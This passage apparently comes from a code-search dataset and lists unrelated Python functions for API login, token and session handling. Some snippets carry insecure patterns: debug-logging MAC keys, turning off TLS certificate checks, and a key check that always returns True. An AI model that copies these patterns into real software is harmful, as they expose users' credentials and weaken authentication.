debugJson(r.json)\n\n # now we have permanent keys\n self.mac_key_id = r.json['access_token'].encode('utf-8')\n self.mac_key = r.json['mac_key'].encode('utf-8')\n debugDetail('final mac key id: %s'%self.mac_key_id)\n debugDetail('final mac key: %s'%self.mac_key)\n\n # return the keys\n return {\n 'appID': self.appID,\n 'mac_key_id': self.mac_key_id,\n 'mac_key': self.mac_key,\n }",
"def auth_token(self):",
"def _authenticate(self):\n url = self.endpoint + \"/tokens\"\n h = httplib2.Http()\n response, rawcontent = h.request(\n url, \n method=\"POST\",\n headers={ \"Content-Type\":\"application/json\" },\n body=json.dumps(self.credentials()))\n content = json.loads(rawcontent)\n self.token = content['access']['token']['id']\n #TODO: this needs to convert the ISO8601 string to a timestamp\n self.expiration = content['access']['token']['expires']\n self.catalog = content['access']['serviceCatalog']",
"def _auth(self):\n url = 'https://forsight.crimsonhexagon.com/api/authenticate?'\n\n payload = {\n 'username': self.username,\n 'password': self.password\n }\n\n r = self.session.get(url, params=payload)\n j_result = r.json()\n self.auth_token = j_result[\"auth\"]\n #print('-- Crimson Hexagon Authenticated --')\n return",
"def authentication(): \n pathToConfig = os.path.join(prefix, \"twitterConfig\")\n config = json.load(open(pathToConfig))\n consumer_key = config['consumer_key']\n consumer_secret = config['consumer_secret']\n access_token = config['access_token']\n access_token_secret = config['access_token_secret']\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_token, access_token_secret=access_token_secret)\n return api",
"def __init__(self, key_id: str, user: str, password: str):\n\n self.key_id = key_id\n self.user = user\n self.password = password\n self.con_strategy = \"unknown\"\n self.session = requests.Session()\n self.session.auth = (user, password)\n self.__fields = None\n if self.key_id == \"localhost\":\n self.local_ip_list = \"127.0.0.1\"\n self.local_ip = \"127.0.0.1\"\n self.port = \"52199\"\n self.con_strategy = \"local\"",
"def authenticate(self, api_key):\n self.headers['x-rapidapi-key'] = api_key",
"def authenticate(self):\n token = self.get_config('token')\n if token:\n self.root.connection.login(\n None, None, token=token, auth_type='Bearer'\n )\n else:\n config.use_sessions = True\n self.root.load_session().get()",
"def skyserv_authenticator(self):\n \n header = {\n 'Content-Type': accept, \n 'X-Auth-Token': self.casjobtoken,\n 'Accept': accept\n }\n # this format is disgusting but required....\n authdata = {\n 'auth' :{\n 'identity': {\n 'password': {\n 'user': {\n 'name': username,\n 'password': password\n }\n }\n }\n }\n }\n payload = json.dumps(authdata).encode(encoding='utf-8')\n try:\n post = requests.post(self.loginurl, data=payload, headers=header)\n\n if post.status_code == 200:\n response = json.loads(post.text)\n token = response[self.tokenkey]\n return token\n else:\n print('Username and/or password are invalid.')\n post.raise_for_status()\n except Exception as e:\n raise(str(e))",
"def __init__(self):\n self.base_url = credentials.api['base_url']\n self.config_path = credentials.api['config_path']\n self.group_base = credentials.api['group_base']\n self.session = requests.session()\n self.uidaruba = self.login()",
"def get_api_keys(owner):\n api.get_all(owner)",
"def authenticate():\n\n # We are uploading and then downloading so we want Musicmanager\n api = Musicmanager()\n\n # Attempt to authenticate and log in\n logged_in = api.login()\n\n # If login() returns false, you have not performed oauth yet, or did not\n # write your credentials to your disk. Using oauth allows authentication\n # without providing plaintext credentials to the application\n if not logged_in:\n print('No oauth credentials found, please authenticate your account')\n\n # Performs oauth and stores generated credentials to Appdirs \n # 'user_data_dir' by default. oauth only needs to be performed once per \n # machine if the credentials are stored, which is the default behavior.\n authenticated = api.perform_oauth(open_browser=True)\n else:\n print('Successfully logged in.\\n')\n\n return api",
"def login(username, password, store=True):\r\n url = '{}/login'.format(USGS_API_ENDPOINT)\r\n payload = {\r\n \"jsonRequest\": payloads.login(username, password)\r\n }\r\n logger.debug(\"API call URL: {}\".format(url))\r\n logger.debug(\"API call payload hidden.\")\r\n resp = requests.post(url,payload)\r\n if resp.status_code is not 200:\r\n raise USGSError(resp.text)\r\n response = resp.json()\r\n logger.debug(\"Received response:\\n{}\".format(json.dumps(response, indent=4)))\r\n apiKey = response[\"data\"]\r\n\r\n if apiKey is None:\r\n raise USGSError(response[\"error\"])\r\n \r\n if store:\r\n logger.debug(\"Writing API key to file {}\".format(KEY_FILE))\r\n with open(KEY_FILE, \"w\") as f:\r\n f.write(apiKey)\r\n \r\n return response",
"def load_api_keys(self):\n self.api_keys = self.config.get('keys', [])",
"def _create_redash_session():\n session = requests.Session()\n session.headers.update({'Authorization': 'Key {}'.format(API_KEY)})\n return session",
"def __authenticate(self):\n body = {\"authenticationToken\": self.__get_authentication_token()}\n result = self.__call(\"POST\", \"https://api.voiapp.io/v1/auth/session\", json=body)\n\n if result and \"accessToken\" in result and \"authenticationToken\" in result:\n self._accessToken = result[\"accessToken\"]\n self.__set_authentication_token(result[\"authenticationToken\"])\n else:\n _LOGGER.warning(\"Authentication failed: Erroneous response (%s)\", result)",
"def openai_auth():\n os.environ['OPENAI_API_KEY'] = key = load_openai_api_key()\n try:\n module = sys.modules['openai']\n module.api_key = key\n except Exception as e:\n warnings.warn('openai library has not been imported. API key not set.')",
"def test_existing_session_auth_token(self):\n\n test_header = {'X-Auth-Token': 'pretend_token'}\n\n with self.app_sess1 as c:\n ret1 = c.get('/', headers=test_header)\n ret2 = c.get('/', headers=test_header)\n self.assertEqual(ret1.data, ret2.data)",
"def token_auth(self):\n self.client = APIClient()\n self.user = User.objects.create_user(username='testuser', email='[email protected]', password='testpassword')\n self.token = Token.objects.create(user=self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + self.token.key)",
"def __init__(self, **kwargs):\n\n session = vk_api.VkApi(**kwargs)\n try:\n session.auth(token_only=True)\n except vk_api.AuthError as error_msg:\n print(error_msg)\n raise\n self.api = session.get_api()",
"def vault_auth():\n # Check if vault is sealed\n if client.sys.is_sealed() == True:\n # if the vault is SEALED, UNSEAL IT using the unseal_key\n unseal_response = client.sys.submit_unseal_key(vault_unseal_key)\n\n # [Uncomment line below only if you want to generate a new API token for the application your ROOT admin registered]\n # Keep in mind you need Application Role ID and Secret ID\n client_data = client.auth_approle(vault_role_id, vault_secret_id)\n # print(client_data['auth']['client_token'])\n\n # Authenticate against the VAULT using the new CLIENT TOKEN conatained in the new dict object\n client.token = client_data['auth']['client_token']",
"def get_api_key(api_key):\n api.get(api_key)",
"async def _fetch_access_token(session: ClientSession) -> dict:\n LOGGER.debug('fetching access token...')\n password = config.get('WFWX_SECRET')\n user = config.get('WFWX_USER')\n auth_url = config.get('WFWX_AUTH_URL')\n async with session.get(auth_url, auth=BasicAuth(login=user, password=password)) as response:\n return await response.json()",
"def test001_authenticate_user(self):\n self.lg('%s STARTED' % self._testID)\n\n self.lg('- Create user1 with admin access ')\n old_password = str(uuid.uuid4()).replace('-', '')[0:10]\n user1 = self.cloudbroker_user_create(group='admin', password=old_password)\n\n self.lg(\"- Authenticate U1 ,should return session key[user1_key] .\")\n user1_key = self.get_authenticated_user_api(username=user1, password=old_password)\n self.assertTrue(user1_key)\n\n self.lg(\"- Use U1's key to list the accounts for U1, should succeed.\")\n accounts_list = user1_key.cloudapi.accounts.list()\n self.assertEqual(accounts_list, [])",
"def setup(self):\n self.session = requests.session()\n self.session.headers.update({'Authorization': 'token %s' %\n self.access_token,\n 'Content-Type': 'application/json'})\n self.base_url = self.base_url_parts",
"def _login_vapi(self):\n session = requests.Session()\n session.verify = self.validate_certs\n if not self.validate_certs:\n # Disable warning shown at stdout\n requests.packages.urllib3.disable_warnings()\n\n print(\"logging in\")\n client = create_vsphere_client(server=self.hostname,\n username=self.username,\n password=self.password,\n session=session)\n if client is None:\n raise Exception(\"Failed to login to %s using %s\" %\n (self.hostname, self.username))\n return client",
"def get_key(self, user, api_key):\n return True",
"def auth():\n pass",
"def auth():\n pass",
"def authenticate(self):\n try:\n self._token = self._lookup_token()\n except:\n raise HTTPError(\n \"Unable to get short-lived access token for cyberark storage\"\n )",
"def signin(self, username=None, password=None):\n try:\n loadAPI_key(username, password)\n databases.checkUser(username, password)\n print(\"API KEY\")\n signing_key = cherrypy.session['signing_key']\n\n pubkey_hex = signing_key.verify_key.encode(encoder=nacl.encoding.HexEncoder)\n pubkey_hex_str = pubkey_hex.decode('utf-8')\n\n message_bytes = bytes(pubkey_hex_str + username, encoding='utf-8')\n signed = signing_key.sign(message_bytes, encoder=nacl.encoding.HexEncoder)\n signature_hex_str = signed.signature.decode('utf-8')\n\n addPubkey(pubkey_hex_str, signature_hex_str)\n\n error = authoriseUserLogin(pubkey_hex_str)\n\n headers = {\n 'X-username': username,\n 'X-apikey': cherrypy.session['api_key'],\n 'Content-Type': 'application/json; charset=utf-8',\n }\n\n loginserver_record_get = requests.get(url=\"http://cs302.kiwi.land/api/get_loginserver_record\", headers=headers).json()\n loginserver_record = loginserver_record_get[\"loginserver_record\"]\n\n print(error)\n if error != 1:\n cherrypy.session['pubkey_hex_str'] = pubkey_hex_str\n cherrypy.session['signature_hex_str'] = signature_hex_str\n cherrypy.session['loginserver_record'] = loginserver_record\n getListAPI()\n userList = listUsers()\n requests.get(url=\"http://cs302.kiwi.land/api/check_pubkey\", headers=headers)\n ping()\n raise cherrypy.HTTPRedirect('/')\n else:\n raise cherrypy.HTTPRedirect('/login?bad_attempt=1')\n except:\n raise cherrypy.HTTPRedirect('/index')",
"def connect(api, username, password):\n\treturn api.login(username, password)",
"def connect(self):\n r = authentication.token(connection=self)\n\n\n self.auth_token = r.json().get('token')",
"def get_api_keys(self, **kwargs):\n\n all_params = ['page', 'per_page', '_from', 'to', 'sort_dir', 'sort_field', 'filters']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method get_api_keys\" % key\n )\n params[key] = val\n del params['kwargs']\n\n\n resource_path = '/apikeys'.replace('{format}', 'json')\n path_params = {}\n\n query_params = {}\n if 'page' in params:\n query_params['_page'] = params['page']\n if 'per_page' in params:\n query_params['_perPage'] = params['per_page']\n if '_from' in params:\n query_params['_from'] = params['_from']\n if 'to' in params:\n query_params['_to'] = params['to']\n if 'sort_dir' in params:\n query_params['_sortDir'] = params['sort_dir']\n if 'sort_field' in params:\n query_params['_sortField'] = params['sort_field']\n if 'filters' in params:\n query_params['_filters'] = params['filters']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['application/json'])\n\n # Authentication setting\n auth_settings = ['privileges', 'apikey']\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n response_type='list[ApiKey]',\n auth_settings=auth_settings,\n callback=params.get('callback'))\n return response",
"async def authenticate(self, request: web.Request) -> Dict[str, Any]:",
"def getNextApiKey(self):\n\n self.resetSession(get_new_api_key=False)\n\n if self.key_idx == len(self.api_keys):\n self.key_idx = 0\n\n self.session.auth = (self.api_keys[self.key_idx][0], '')\n self.number_of_max_req = self.api_keys[self.key_idx][1]\n\n self.key_idx += 1",
"def authenticate(credentials):",
"def test_session(self, k8sconfig):\n # Basic.\n config = k8sconfig._replace(token=None)\n sess = k8s.session(config)\n assert \"authorization\" not in sess.headers\n\n # With access token.\n config = k8sconfig._replace(token=\"token\")\n sess = k8s.session(config)\n assert sess.headers[\"authorization\"] == \"Bearer token\"\n\n # With access token and client certificate.\n ccert = k8s.K8sClientCert(crt=\"foo\", key=\"bar\")\n config = k8sconfig._replace(token=\"token\", client_cert=ccert)\n sess = k8s.session(config)\n assert sess.headers[\"authorization\"] == \"Bearer token\"\n assert sess.cert == (\"foo\", \"bar\")",
"def __init__(self, session: ClientSession, token: str, *, api_base: str = API_BASE):\r\n self._session = session\r\n self._token = token\r\n self._api_base = api_base",
"def get_api_key(self):\r\n url = '{0}/{1}'.format(self.get_url(), 'api_key')\r\n\r\n return http.Request('GET', url), parsers.parse_json",
"def _initialize_session(self):\n session = requests.Session()\n session.auth = (self.login, self.password)\n session.verify = False\n session.headers.update({'Accept': 'application/json'})\n session.headers.update({'Content-type': 'application/json'})\n return session",
"def authenticate(self) -> api.API:\r\n original_api = api.API()\r\n for c in self._credentials: # each app\r\n user_auth = tweepy.OAuthHandler(c.consumer_key, c.consumer_secret)\r\n user_auth.set_access_token(c.access_token, c.access_secret)\r\n app_auth = tweepy.AppAuthHandler(c.consumer_key, c.consumer_secret)\r\n original_api.append(tweepy.API(user_auth), tweepy.API(app_auth))\r\n return original_api",
"def generate_access_key(self):\n\t\tfrom app import app\n\t\ts = JSONWebSignatureSerializer(app.config['SECRET_KEY'])\n\t\taccess_key = s.dumps({'username': self.username}) \n\t\tself.access_key = access_key",
"def api():\n global KEY_FILE\n global APCA_API_KEY_ID\n global APCA_API_SECRET_KEY\n\n if \"APCA_ID\" in os.environ:\n APCA_ID = os.environ[\"APCA_ID\"]\n APCA_KEY = os.environ[\"APCA_KEY\"]\n elif KEY_FILE:\n auth_header = authentication_header()\n APCA_ID = str(auth_header[\"APCA-API-KEY-ID\"])\n APCA_KEY = str(auth_header[\"APCA-API-SECRET-KEY\"])\n else:\n APCA_ID = APCA_API_KEY_ID\n APCA_KEY = APCA_API_SECRET_KEY\n\n # Open the API connection\n api = tradeapi.REST(APCA_ID, APCA_KEY, \"https://paper-api.alpaca.markets\")\n # Get account info\n api.get_account()\n return api",
"def auth(self):\n try:\n print(\"You are going to log in as Полигон\")\n os.system('clear')\n self.session = vk_api.VkApi(token=self.token)\n self.session._auth_token()\n print(\"authred\")\n vk = self.session.get_api()\n global authed\n self.authed = True\n print('gAut Online')\n self.longpollserver = bot_longpoll.VkBotLongPoll(self.session, 172301854)\n self.gLPS = threading.Thread(target=self.lps, args=(self.session, ), daemon=True)\n return True\n except Exception as e:\n print(e)\n pass",
"def get_session():\n\n jwt_secret = base64.urlsafe_b64decode(os.getenv('AUTH0_CLIENT_SECRET'))\n claims = {\n 'sub': 'rf|airflow-user',\n 'iat': datetime.utcnow(),\n 'exp': datetime.utcnow() + timedelta(hours=3)\n }\n encoded_jwt = jwt.encode(claims, jwt_secret, algorithm='HS256')\n session = requests.Session()\n\n session.headers.update({'Authorization': 'Bearer {}'.format(encoded_jwt)})\n return session",
"def test_auth(self):\n self.api.auth()\n self.assertIsNotNone(self.api.session, msg=\"auth() doesn't return a session\")\n\n self.api.request('logout')\n self.assertIn('list', self.api.request('sys.settings.get').data,\n msg=\"auth() doesn't restore sessions expired\")",
"def open(self):\n auth = {'user': self._username, 'password': self._password}\n status, data = self.post('credentials', body=auth)\n if status == 201:\n # 201 (created) => Session succefully created\n self._headers.update({'X-HP3PAR-WSAPI-SessionKey': data['key']})\n self._key = data['key']\n elif status == 403:\n # 403 (forbidden) => Wrong user or password\n raise AuthError('Cannot connect to StoreServ. '\n 'Authentification error: %s', data['desc'])",
"def vk_sign_in(self):\r\n\r\n app_id = 5531757\r\n print('\\n\\n**********АВТОРИЗАЦИЯ**********\\n\\n')\r\n if (self.json_data['auth_info']['login'] and self.json_data['auth_info']['password'] and\r\n self.json_data['auth_info']['login_key'] and self.json_data['auth_info']['password_key']):\r\n user_login = self.decrypt(self.json_data['auth_info']['login'], self.json_data['auth_info']['login_key'])\r\n user_password = self.decrypt(self.json_data['auth_info']['password'], self.json_data['auth_info']['password_key'])\r\n else:\r\n user_login = input('Введите имя пользователя (e-mail): ')\r\n user_password = input('Введите пароль: ')\r\n print(\"Желаете сохранить логин/пароль? (y/n)\")\r\n while True:\r\n desision = input();\r\n if desision == 'y':\r\n enc_login = self.encrypt(user_login)\r\n enc_password = self.encrypt(user_password)\r\n self.json_data['auth_info'] = {'login': enc_login[0],\r\n 'password': enc_password[0],\r\n 'login_key': enc_login[1],\r\n 'password_key': enc_password[1]}\r\n self.save_json_data()\r\n break\r\n elif desision == 'n':\r\n break\r\n\r\n\r\n print('Создание сессии, ожидайте...')\r\n self.session = vk.AuthSession(app_id=app_id, user_login=user_login, user_password=user_password,\r\n scope=\"wall, messages\")\r\n print('Сессия создана...')\r\n print('Подключение к VK api...')\r\n self.vkapi = vk.API(self.session, timeout=300)\r\n print('Подключено...\\n')",
"def test_login(self, mock):\n _setup_responses(mock)\n api = LiveStreamApi(\"user\", \"pass\")\n\n api.login()\n\n with self.subTest(\"stores the token on the api object\"):\n self.assertEqual(api._token, \"ffffffffffffffffffffffffffffffffffffffff\")\n\n with self.subTest(\"stores ssesyranac cookie on the api object\"):\n self.assertEqual(api._ssesyranac, \"ssesyranac\")",
"def async_get_api_key(self, splunk_cookie, auth_header):\n uri = self.get_api_key_uri()\n return self.async_get_request(uri, headers={'splunkd_8089':splunk_cookie}, auth_header=auth_header)",
"def getToken():\n # First check if query is okay or not\n data = json.loads(request.data)\n username = data.get(\"username\",None)\n password = data.get(\"password\",None)\n \n if username is None or password is None:\n return jsonify({\n \"error\" : \"Incorrect API Request\",\n \"code\" : \"400\" # Bad request\n })\n check_header = magiccheck(request.headers.get('X-VITASK-API'))\n if(check_header == False):\n return jsonify({\n \"error\" : \"Invalid Header\",\n \"code\" : \"403\" # Unauthorised\n })\n # Now began actual work\n username = username.upper()\n \n # This API is only to get user token and get personal details. For syncing details, there will be a seperate API\n # This assumes that token is None just like previous authenticate\n valid = True\n try:\n sess, valid = generate_session(username, password)\n except Exception as e:\n return jsonify({\n \"error\" : \"Something broke\",\n \"code\" : \"500\"\n })\n if( valid == False ):\n # Password incorrect\n return jsonify({\n \"error\" : \"Incorrect Password\"\n })\n ref = db.reference('vitask')\n try:\n profile = {}\n profile, status = get_student_profile(sess, username)\n if( status == False ):\n print(\"Failed at profile.\")\n return jsonify({\"Error\": \"Internal Error in fetching profile.Please try again.\"})\n session['id'] = profile['appNo']\n session['name'] = profile['name']\n session['reg'] = profile['regNo']\n session['loggedin'] = 1\n except Exception as e:\n print(e)\n return jsonify({\"Error\": \"Internal Error in fetching profile.Please try again.\"})\n finally:\n # Timetable,Attendance,Acadhistory and Marks fetching\n try:\n status = parallel_timetable(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at timetable.\")\n return jsonify({\"Error\": \"Internal Error in fetching timetable.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at timetable.\")\n return jsonify({\"Error\": \"Internal Error in fetching timetable.Please try again.\"})\n finally:\n try:\n status = parallel_attendance(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at attendance.\")\n return jsonify({\"Error\": \"Internal Error in fetching attendance.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at attendance.\")\n return jsonify({\"Error\": \"Internal Error in fetching attendance.Please try again.\"})\n finally:\n try:\n status = parallel_acadhistory(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at acadhistory.\")\n return jsonify({\"Error\": \"Internal Error in fetching academic history.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at acadhistory.\")\n return jsonify({\"Error\": \"Internal Error in fetching academic history.Please try again.\"})\n finally:\n try:\n status = parallel_marks(sess, username, session['id'])\n if( status == False ):\n print(\"Failed at marks.\")\n return jsonify({\"Error\": \"Internal Error in fetching marks.Please try again.\"})\n except Exception as e:\n print(e)\n print(\"Exception at marks.\")\n return jsonify({\"Error\": \"Internal Error in fetching marks.Please try again.\"})\n finally:\n # API Calls logging\n temp = ref.child(\"account\").child('account-'+profile['appNo']).child(profile['appNo']).get()\n count = int(temp['API-Calls']) + 1\n tut_ref = ref.child(\"account\")\n new_ref = tut_ref.child('account-'+profile['appNo'])\n new_ref.set({\n profile['appNo']: {\n 'X-VITASK-API': temp['X-VITASK-API'],\n 'Name': temp['Name'],\n 'RegNo': 
temp['RegNo'],\n 'Account-Type': temp['Account-Type'],\n 'API-Calls': count,\n 'Start-Date': temp['Start-Date'],\n 'End-Date': temp['End-Date']\n }\n })\n return jsonify({'Name': profile['name'],'School': profile['school'],'Branch': profile['branch'],'Program': profile['program'],'RegNo': profile['regNo'],'AppNo': profile['appNo'],'Email': profile['email'],'ProctorEmail': profile['proctorEmail'],'ProctorName': profile['proctorName'],'APItoken': profile['token']})",
"def _require_login(self):\n self.client.credentials(HTTP_AUTHORIZATION='Token ' + str(self.token))",
"def auth_step_1(request):\n print(\"Auth Step 1 ..... \")\n credentials = getattr(settings, \"ZERODHA_CREDENTIALS\")\n if not credentials:\n return HttpResponse(\"Invalid Credentials\")\n\n api_key = credentials.get(\"api_key\")\n if not api_key:\n return HttpResponse(\"Invalid Credentials\")\n\n return redirect(\n \"https://kite.zerodha.com/connect/login?v=3&api_key={}\".format(api_key)\n )",
"def __init__(self, api_key, api_secret, base_url=settings.TWITTER_API_URL):\n self.api_key = api_key\n self.api_secret = api_secret\n self.base_url = base_url\n self.bearer_token = None\n self.__auth = None\n self.get_bearer_token()\n self.set_requests_auth()\n self.session = requests_retry_session()",
"def _v3_auth(self, url):\n body = {\n \"auth\": {\n \"identity\": {\n \"methods\": [\"password\"],\n \"password\": {\n \"user\": {\n \"domain\": {\n \"name\": self.domain\n },\n \"name\": self.user,\n \"password\": self.password\n }\n }\n },\n \"scope\": {\n \"project\": {\n \"domain\": {\n \"name\": self.domain\n },\n \"name\": self.project\n }\n }\n }\n }\n if not url.endswith('/'):\n url += \"/\"\n return self.post(url + 'auth/tokens', body)",
"def authenticate(self):\n # Check if we already have access token and secret\n if not os.path.exists(self.sTOKEN_FILE):\n # 1) Obtain Request token\n oauth = OAuth1(self.apiKey, client_secret=self.apiKeySecret, callback_uri='oob')\n r = requests.post(url=self.sREQUEST_TOKEN_URL, auth=oauth)\n credentials = parse_qs(r.content)\n resource_owner_key = credentials.get('oauth_token')[0]\n resource_owner_secret = credentials.get('oauth_token_secret')[0]\n\n # 2) Obtain authorization for the user to access resources\n # Redirect the user to /authorize and get the callback\n authorize_url = self.sAUTHORIZE_URL + '?oauth_token=' + resource_owner_key + \\\n '&oauth_consumer_key=' + self.apiKey + \\\n '&Access=Full&Permissions=Modify'\n\n print 'Please go here and authorize,', authorize_url\n verifier = raw_input('Please enter the six-digit PIN code: ')\n\n # 3) Obtain final access token\n oauth = OAuth1(self.apiKey, client_secret = self.apiKeySecret,\n resource_owner_key = resource_owner_key,\n resource_owner_secret = resource_owner_secret,\n verifier=verifier)\n r = requests.post(url=self.sACCESS_TOKEN_URL, auth=oauth)\n\n credentials = parse_qs(r.content)\n access_token = credentials.get('oauth_token')[0]\n access_token_secret = credentials.get('oauth_token_secret')[0]\n\n # Store access token so we can use it later\n with open(self.sTOKEN_FILE, 'w') as f:\n json.dump({'access_token': access_token,\n 'access_token_secret': access_token_secret}, f)\n\n else:\n with open(self.sTOKEN_FILE, 'r') as f:\n tokens = json.load(f)\n access_token = tokens.get('access_token')\n access_token_secret = tokens.get('access_token_secret')\n\n # store the file access token details for use in other methods\n self.accessToken = access_token\n self.accessTokenSecret = access_token_secret",
"def login():\n tree = xml.parse('credentials.xml')\n root = tree.getroot()\n apikey = root.find('apikey').text\n userkey = root.find('userkey').text\n username = root.find('username').text\n url = 'https://api.thetvdb.com/login'\n headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}\n auth = {\"apikey\": apikey, \"userkey\": userkey, \"username\": username}\n r = requests.post(url, headers=headers, data=json.dumps(auth))\n json_data = json.loads(r.text)\n token = json_data.get('token')\n return token",
"def auth(self):\n return self.creds(\"[email protected]\", cookie=\"USERTOKEN: authcookie\")",
"def setCredentials(self,api_id,api_secret):\n self.api_id = api_id\n self.api_secret = api_secret",
"def _auto_auth(self, **params):\r\n response = self.client.get(self.url, params)\r\n self.assertEqual(response.status_code, 200)\r\n\r\n # Check that session and CSRF are set in the response\r\n for cookie in ['csrftoken', 'sessionid']:\r\n self.assertIn(cookie, response.cookies) # pylint: disable=E1103\r\n self.assertTrue(response.cookies[cookie].value) # pylint: disable=E1103\r",
"def sessionkey(cls, session):\n return session[\"credential\"][\"Authorization\"]",
"def __init__(self, url, username, password):\n self.session = requests.session()\n self.session.auth = (username, password)\n self.session.headers.update({\n 'Accept': JSON_CONTENT_TYPE,\n })\n self.url = url",
"def set_auth(self):\n timestamp = str(int(time.time()))\n unique = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(16))\n hashstr = sha1((self.callerid + timestamp +\n self.privatekey + unique).encode('utf8')).hexdigest()\n logger.debug(\"Time from api {}\".format(timestamp))\n\n return {\"callerId\": self.callerid,\n \"time\": timestamp,\n \"unique\": unique,\n \"hash\": hashstr\n }",
"def get_saucelabs_username_and_key():\r\n return {\"username\": settings.SAUCE.get('USERNAME'), \"access-key\": settings.SAUCE.get('ACCESS_ID')}",
"def auth():\n\n if current_user.is_authenticated:\n\n # OAuth is only necesary when we don't have a user's API\n if not current_user.zoter_api:\n\n def get_auth_url():\n request_token, request_token_secret = zoteroAuth.get_request_token()\n session['request_token'] = request_token\n session['request_token_secret'] = request_token_secret\n auth_url = zoteroAuth.get_authorize_url(request_token)\n return auth_url\n\n flash('Hi! {}, please visit <a href=\"{}\" target=\"new\">here</a> for authentication.'.format(current_user.username, get_auth_url()))\n return redirect(url_for('bookshelf'))\n \n else:\n flash('You already have an API key!')\n return redirect(url_for('sync'))",
"def __init__(self, apikey, secret):\n self.apikey = apikey\n self.secret = secret",
"def load_config_key():\n try:\n global api_key\n api_key = os.environ['IN_API_KEY']\n if len(api_key) == 32:\n try:\n int(api_key, 16)\n except ValueError:\n print(\"Invalid API key\")\n except KeyError:\n print('No API Token detected. '\n 'Please visit {0} and get an API Token, '\n 'which will be used by instantnews '\n 'to get access to the data.'\n .format(API_URL))\n sys.exit(1)",
"def __init__(self, public_key, private_key, token, token_secret, base_url='http://api.telldus.com'):\n self.public_key = public_key\n self.private_key = private_key\n self.token = token\n self.token_secret = token_secret\n\n self.base_url = base_url\n\n self.oauth = self.generate_temp_session()",
"def hmac_authentication(self, identity: str, secret: str) -> None:\n self.api_session.auth = HmacAuth(identity=identity, secret=secret)",
"def set_credentials():",
"async def authenticate(hass: core.HomeAssistant, host, port, servers):\n\n hub = RoonHub(hass)\n (token, core_id, core_name) = await hub.authenticate(host, port, servers)\n if token is None:\n raise InvalidAuth\n\n return {\n CONF_HOST: host,\n CONF_PORT: port,\n CONF_ROON_ID: core_id,\n CONF_ROON_NAME: core_name,\n CONF_API_KEY: token,\n }",
"def get_session_keys(conn, pairing_data):\n headers = {\n 'Content-Type': 'application/pairing+tlv8'\n }\n\n #\n # Step #1 ios --> accessory (send verify start Request) (page 47)\n #\n ios_key = py25519.Key25519()\n\n request_tlv = TLV.encode_list([\n (TLV.kTLVType_State, TLV.M1),\n (TLV.kTLVType_PublicKey, ios_key.pubkey)\n ])\n\n conn.request('POST', '/pair-verify', request_tlv, headers)\n resp = conn.getresponse()\n response_tlv = TLV.decode_bytes(resp.read())\n\n #\n # Step #3 ios --> accessory (send SRP verify request) (page 49)\n #\n assert TLV.kTLVType_State in response_tlv, response_tlv\n assert response_tlv[TLV.kTLVType_State] == TLV.M2\n assert TLV.kTLVType_PublicKey in response_tlv, response_tlv\n assert TLV.kTLVType_EncryptedData in response_tlv, response_tlv\n\n # 1) generate shared secret\n accessorys_session_pub_key_bytes = response_tlv[TLV.kTLVType_PublicKey]\n shared_secret = ios_key.get_ecdh_key(\n py25519.Key25519(pubkey=bytes(accessorys_session_pub_key_bytes), verifyingkey=bytes()))\n\n # 2) derive session key\n hkdf_inst = hkdf.Hkdf('Pair-Verify-Encrypt-Salt'.encode(), shared_secret, hash=hashlib.sha512)\n session_key = hkdf_inst.expand('Pair-Verify-Encrypt-Info'.encode(), 32)\n\n # 3) verify authtag on encrypted data and 4) decrypt\n encrypted = response_tlv[TLV.kTLVType_EncryptedData]\n decrypted = chacha20_aead_decrypt(bytes(), session_key, 'PV-Msg02'.encode(), bytes([0, 0, 0, 0]),\n encrypted)\n if decrypted == False:\n raise homekit.exception.InvalidAuth(\"step 3\")\n d1 = TLV.decode_bytes(decrypted)\n assert TLV.kTLVType_Identifier in d1\n assert TLV.kTLVType_Signature in d1\n\n # 5) look up pairing by accessory name\n accessory_name = d1[TLV.kTLVType_Identifier].decode()\n\n if pairing_data['AccessoryPairingID'] != accessory_name:\n raise homekit.exception.IncorrectPairingID(\"step 3\")\n \n accessory_ltpk = py25519.Key25519(pubkey=bytes(), verifyingkey=bytes.fromhex(pairing_data['AccessoryLTPK']))\n\n # 6) verify accessory's signature\n accessory_sig = d1[TLV.kTLVType_Signature]\n accessory_session_pub_key_bytes = response_tlv[TLV.kTLVType_PublicKey]\n accessory_info = accessory_session_pub_key_bytes + accessory_name.encode() + ios_key.pubkey\n if not accessory_ltpk.verify(bytes(accessory_sig), bytes(accessory_info)):\n raise homekit.exception.InvalidSignature(\"step 3\")\n\n # 7) create iOSDeviceInfo\n ios_device_info = ios_key.pubkey + pairing_data['iOSPairingId'].encode() + accessorys_session_pub_key_bytes\n\n # 8) sign iOSDeviceInfo with long term secret key\n ios_device_ltsk_h = pairing_data['iOSDeviceLTSK']\n ios_device_ltsk = py25519.Key25519(secretkey=bytes.fromhex(ios_device_ltsk_h))\n ios_device_signature = ios_device_ltsk.sign(ios_device_info)\n\n # 9) construct sub tlv\n sub_tlv = TLV.encode_list([\n (TLV.kTLVType_Identifier, pairing_data['iOSPairingId'].encode()),\n (TLV.kTLVType_Signature, ios_device_signature)\n ])\n\n # 10) encrypt and sign\n encrypted_data_with_auth_tag = chacha20_aead_encrypt(bytes(), session_key, 'PV-Msg03'.encode(), bytes([0, 0, 0, 0]),\n sub_tlv)\n tmp = bytearray(encrypted_data_with_auth_tag[0])\n tmp += encrypted_data_with_auth_tag[1]\n\n # 11) create tlv\n request_tlv = TLV.encode_list([\n 